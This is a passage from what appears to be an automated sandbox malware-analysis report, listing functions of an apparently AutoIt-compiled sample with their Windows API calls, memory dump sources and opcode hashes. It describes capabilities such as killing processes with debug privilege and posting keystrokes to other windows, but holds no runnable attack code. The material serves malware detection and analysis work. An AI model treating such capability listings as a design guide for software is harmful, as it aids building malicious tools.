                                                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0013FA7C
                                                        • CloseHandle.KERNEL32(?), ref: 0013FAAB
                                                        • CloseHandle.KERNEL32(?), ref: 0013FB22
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                        • String ID:
                                                        • API String ID: 4090791747-0
                                                        • Opcode ID: 0edc0a7c231fcfa4356dd5ccebb257a7fe4b608a903e18f3a3786e74be2521ec
                                                        • Instruction ID: 16be991a321b73d57d59b711828a54310717863bac9a697c3a6cc5ed65a7ad65
                                                        • Opcode Fuzzy Hash: 0edc0a7c231fcfa4356dd5ccebb257a7fe4b608a903e18f3a3786e74be2521ec
                                                        • Instruction Fuzzy Hash: E3E19E316043419FCB14EF24C895BAABBE5BF85354F14856DF8999B3A2CB30EC46CB52
                                                        Function 00124CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0012466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00123697,?), ref: 0012468B
                                                          • Part of subcall function 0012466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00123697,?), ref: 001246A4
                                                          • Part of subcall function 00124A31: GetFileAttributesW.KERNEL32(?,0012370B), ref: 00124A32
                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00124D40
                                                        • _wcscmp.LIBCMT ref: 00124D5A
                                                        • MoveFileW.KERNEL32(?,?), ref: 00124D75
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                        • String ID:
                                                        • API String ID: 793581249-0
                                                        • Opcode ID: b679b48d00495d821e7de4c1df7d578d34af56c889ba428925078205b824da9c
                                                        • Instruction ID: e8a278b2d75e7d6affba57f2bd6efb9ef11a9b60bc2664a89dcb475346e086fb
                                                        • Opcode Fuzzy Hash: b679b48d00495d821e7de4c1df7d578d34af56c889ba428925078205b824da9c
                                                        • Instruction Fuzzy Hash: AA5151B20083959BC725DBA4DC819DF73ECAF94350F00092EF289D3152EF75A599CB56
                                                        Function 00148645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 001486FF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: InvalidateRect
                                                        • String ID:
                                                        • API String ID: 634782764-0
                                                        • Opcode ID: d4e631f7ff26d349d3aa528e190c1f30c22e9e1aee4eb01fc3eb035a21be8e6b
                                                        • Instruction ID: db6fcf4ed29b033da98664aaea0c8ca3109adea04bd569f7693d1d4f91501166
                                                        • Opcode Fuzzy Hash: d4e631f7ff26d349d3aa528e190c1f30c22e9e1aee4eb01fc3eb035a21be8e6b
                                                        • Instruction Fuzzy Hash: 3751C134500245BEEF249F28CC89FAD7BA5EB05764F614129F914E66F1CF72A980CB50
                                                        Function 000C2B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 000FC2F7
                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 000FC319
                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 000FC331
                                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 000FC34F
                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 000FC370
                                                        • DestroyIcon.USER32(00000000), ref: 000FC37F
                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 000FC39C
                                                        • DestroyIcon.USER32(?), ref: 000FC3AB
                                                          • Part of subcall function 0014A4AF: DeleteObject.GDI32(00000000), ref: 0014A4E8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                        • String ID:
                                                        • API String ID: 2819616528-0
                                                        • Opcode ID: a63b630ba89393e2e8ef967b711f3514f114cd96d2e95f55ff422ae43f83ce67
                                                        • Instruction ID: 7a1191c8fc553aa07d5fd43eb1ecc86ba5b65a25947300adda7e94c4829d7c88
                                                        • Opcode Fuzzy Hash: a63b630ba89393e2e8ef967b711f3514f114cd96d2e95f55ff422ae43f83ce67
                                                        • Instruction Fuzzy Hash: AF517974600609AFDB24DF64CC46FAE3BE5EB58350F10452CF90297AA0DB70AD90EB50
                                                        Function 0011966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0011A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0011A84C
                                                          • Part of subcall function 0011A82C: GetCurrentThreadId.KERNEL32 ref: 0011A853
                                                          • Part of subcall function 0011A82C: AttachThreadInput.USER32(00000000,?,00119683,?,00000001), ref: 0011A85A
                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 0011968E
                                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 001196AB
                                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 001196AE
                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 001196B7
                                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 001196D5
                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 001196D8
                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 001196E1
                                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 001196F8
                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 001196FB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                        • String ID:
                                                        • API String ID: 2014098862-0
                                                        • Opcode ID: eb3b5b31cd7b5d35c346a37e82453b53aaafa212ad18ba1d1a421a879ede855d
                                                        • Instruction ID: bd83d1d369c4f8d7dac880110589ab4332160198fd1f528b429a3487197c6e11
                                                        • Opcode Fuzzy Hash: eb3b5b31cd7b5d35c346a37e82453b53aaafa212ad18ba1d1a421a879ede855d
                                                        • Instruction Fuzzy Hash: C011E1B5910218BEF6106F60DC89FAA3F6DEB4D751F110429F244AB1B0CAF26C91DAA4
                                                        Function 00118921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0011853C,00000B00,?,?), ref: 0011892A
                                                        • HeapAlloc.KERNEL32(00000000,?,0011853C,00000B00,?,?), ref: 00118931
                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0011853C,00000B00,?,?), ref: 00118946
                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,0011853C,00000B00,?,?), ref: 0011894E
                                                        • DuplicateHandle.KERNEL32(00000000,?,0011853C,00000B00,?,?), ref: 00118951
                                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0011853C,00000B00,?,?), ref: 00118961
                                                        • GetCurrentProcess.KERNEL32(0011853C,00000000,?,0011853C,00000B00,?,?), ref: 00118969
                                                        • DuplicateHandle.KERNEL32(00000000,?,0011853C,00000B00,?,?), ref: 0011896C
                                                        • CreateThread.KERNEL32(00000000,00000000,00118992,00000000,00000000,00000000), ref: 00118986
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                        • String ID:
                                                        • API String ID: 1957940570-0
                                                        • Opcode ID: 7945cf2d140600d1af64fa814e16cd21c42b3102ef7319162f174a08e221bcce
                                                        • Instruction ID: 80b8fe9e1af524dd72c8db61b6ebf5a98538e93c8635eb59a6d7e0897e8a9191
                                                        • Opcode Fuzzy Hash: 7945cf2d140600d1af64fa814e16cd21c42b3102ef7319162f174a08e221bcce
                                                        • Instruction Fuzzy Hash: 7601BF79640308FFE710ABA5DC4DF673BACEB89B11F408425FA09DB6A1CA709841CB20
                                                        Function 00139B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                        • API String ID: 0-572801152
                                                        • Opcode ID: 4edbb35535c25d6ae8763a077983423c3da2fc0f8c00123091680d71b2abd0a7
                                                        • Instruction ID: ff8c2e3b9bcee6eb8cf3360b31aacdf2e5215a45858e462c6170704e26fecb99
                                                        • Opcode Fuzzy Hash: 4edbb35535c25d6ae8763a077983423c3da2fc0f8c00123091680d71b2abd0a7
                                                        • Instruction Fuzzy Hash: 74C1B271A0021A9FDF14DFA8D885EEEB7F5FF48314F158469E905AB281E7B0AD41CB90
                                                        Function 00139113 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearInit$_memset
                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                        • API String ID: 2862541840-625585964
                                                        • Opcode ID: d7ef37c4e044ba54bb21a773e22960ad82f16f68e6bd8fcd6bcb4aa6f030ce9b
                                                        • Instruction ID: 8e62da8c086d5bafe9e24fb182254df70251b9f05e718013ee4cd6a21d5b4ce2
                                                        • Opcode Fuzzy Hash: d7ef37c4e044ba54bb21a773e22960ad82f16f68e6bd8fcd6bcb4aa6f030ce9b
                                                        • Instruction Fuzzy Hash: 23918C71A00219ABDF24DFA5C848FAFBBB8FF45710F108159F915AB291DBB09945CFA0
                                                        Function 0013975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0011710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00117044,80070057,?,?,?,00117455), ref: 00117127
                                                          • Part of subcall function 0011710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00117044,80070057,?,?), ref: 00117142
                                                          • Part of subcall function 0011710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00117044,80070057,?,?), ref: 00117150
                                                          • Part of subcall function 0011710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00117044,80070057,?), ref: 00117160
                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00139806
                                                        • _memset.LIBCMT ref: 00139813
                                                        • _memset.LIBCMT ref: 00139956
                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00139982
                                                        • CoTaskMemFree.OLE32(?), ref: 0013998D
                                                        Strings
                                                        • NULL Pointer assignment, xrefs: 001399DB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                        • String ID: NULL Pointer assignment
                                                        • API String ID: 1300414916-2785691316
                                                        • Opcode ID: 0b393a6daf9794e1e95845b7026ca4e84f657fb06291db02abc59aca81990eae
                                                        • Instruction ID: 6326c09ebb56c92a9208354bcfe9bf6f66433c05139e234346602afe202d6db9
                                                        • Opcode Fuzzy Hash: 0b393a6daf9794e1e95845b7026ca4e84f657fb06291db02abc59aca81990eae
                                                        • Instruction Fuzzy Hash: AD913871D00229EBDB10DFA5DC45EDEBBB9EF08310F20416AF519A7291DB71AA44CFA0
                                                        Function 00146D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00146E24
                                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 00146E38
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00146E52
                                                        • _wcscat.LIBCMT ref: 00146EAD
                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00146EC4
                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00146EF2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window_wcscat
                                                        • String ID: SysListView32
                                                        • API String ID: 307300125-78025650
                                                        • Opcode ID: ebaa709e4df17757a1047dd700de451a7ed6da3b10f5cd117ff60bd7cd6287d4
                                                        • Instruction ID: c3001c248038f9e06d88924815753be9c284482a1d9995cff1323a767189a751
                                                        • Opcode Fuzzy Hash: ebaa709e4df17757a1047dd700de451a7ed6da3b10f5cd117ff60bd7cd6287d4
                                                        • Instruction Fuzzy Hash: 9E418F74A00348EBEB21DFA4CC85BEA77E9EF09354F10442AF588A72A1D7719D858B60
                                                        Function 0013E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00123C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00123C7A
                                                          • Part of subcall function 00123C55: Process32FirstW.KERNEL32(00000000,?), ref: 00123C88
                                                          • Part of subcall function 00123C55: CloseHandle.KERNEL32(00000000), ref: 00123D52
                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0013E9A4
                                                        • GetLastError.KERNEL32 ref: 0013E9B7
                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0013E9E6
                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 0013EA63
                                                        • GetLastError.KERNEL32(00000000), ref: 0013EA6E
                                                        • CloseHandle.KERNEL32(00000000), ref: 0013EAA3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                        • String ID: SeDebugPrivilege
                                                        • API String ID: 2533919879-2896544425
                                                        • Opcode ID: c672695387feef9f818d14ab978015fe2e4f8050c52786e4b6c5aaf096620421
                                                        • Instruction ID: 9cdd5b7e88754bab2216140a84b05eccd11360199d5c81ddeafef4f162062c05
                                                        • Opcode Fuzzy Hash: c672695387feef9f818d14ab978015fe2e4f8050c52786e4b6c5aaf096620421
                                                        • Instruction Fuzzy Hash: 384186312003019FDB18EF24C895FAEBBE6AF51714F08842DF9069B3D2CB75A849CB95
                                                        Function 00122F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadIconW.USER32(00000000,00007F03), ref: 00123033
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: IconLoad
                                                        • String ID: blank$info$question$stop$warning
                                                        • API String ID: 2457776203-404129466
                                                        • Opcode ID: 939e1059505d29e1bf5b08e3f2ea7478a81d85cb77190d19ef5fe0339b6f4d9c
                                                        • Instruction ID: 92d3578e6e0aa4a212e65c827568c81285537ca757630e59246705f6ffdd7b94
                                                        • Opcode Fuzzy Hash: 939e1059505d29e1bf5b08e3f2ea7478a81d85cb77190d19ef5fe0339b6f4d9c
                                                        • Instruction Fuzzy Hash: 95113D313883A6BEE7189B15FC42CAF77ACDF19320B10402AF914662C2DB785F5055B8
                                                        Function 001242F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00124312
                                                        • LoadStringW.USER32(00000000), ref: 00124319
                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0012432F
                                                        • LoadStringW.USER32(00000000), ref: 00124336
                                                        • _wprintf.LIBCMT ref: 0012435C
                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0012437A
                                                        Strings
                                                        • %s (%d) : ==> %s: %s %s, xrefs: 00124357
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                        • API String ID: 3648134473-3128320259
                                                        • Opcode ID: 0a42ecca7f8212d340d6bccb3ce29061e1e071f1708cb8930ce6bf83a31f07a1
                                                        • Instruction ID: 4a83babcef7a5f07136b98b5975266d69daf759c63429834b00e397ee5c265d6
                                                        • Opcode Fuzzy Hash: 0a42ecca7f8212d340d6bccb3ce29061e1e071f1708cb8930ce6bf83a31f07a1
                                                        • Instruction Fuzzy Hash: 09018FF690021CBFE710D7A0DD89EE7776CEB08700F0001A9BB09E2122EA309EC64B70
                                                        Function 0014D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000C2612: GetWindowLongW.USER32(?,000000EB), ref: 000C2623
                                                        • GetSystemMetrics.USER32(0000000F), ref: 0014D47C
                                                        • GetSystemMetrics.USER32(0000000F), ref: 0014D49C
                                                        • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0014D6D7
                                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0014D6F5
                                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0014D716
                                                        • ShowWindow.USER32(00000003,00000000), ref: 0014D735
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0014D75A
                                                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 0014D77D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                        • String ID:
                                                        • API String ID: 1211466189-0
                                                        • Opcode ID: b30319fda9ea672f77f9ffba2e0772f8f21bbbf112ae7fae80b31b06ccf5365d
                                                        • Instruction ID: 80b64ce673d5b9b4d53649330fa03e90773db5ede633d9a38f6a49d99fdbe582
                                                        • Opcode Fuzzy Hash: b30319fda9ea672f77f9ffba2e0772f8f21bbbf112ae7fae80b31b06ccf5365d
                                                        • Instruction Fuzzy Hash: 2AB1BA74600225EFDF18CF68D9857AD7BB1FF04715F098069EC489F6A9DB34A990CBA0
                                                        Function 0013FD11 Relevance: 12.3, APIs: 8, Instructions: 256registryCOMMON
                                                        Download Yara Rule
                                                        APIs
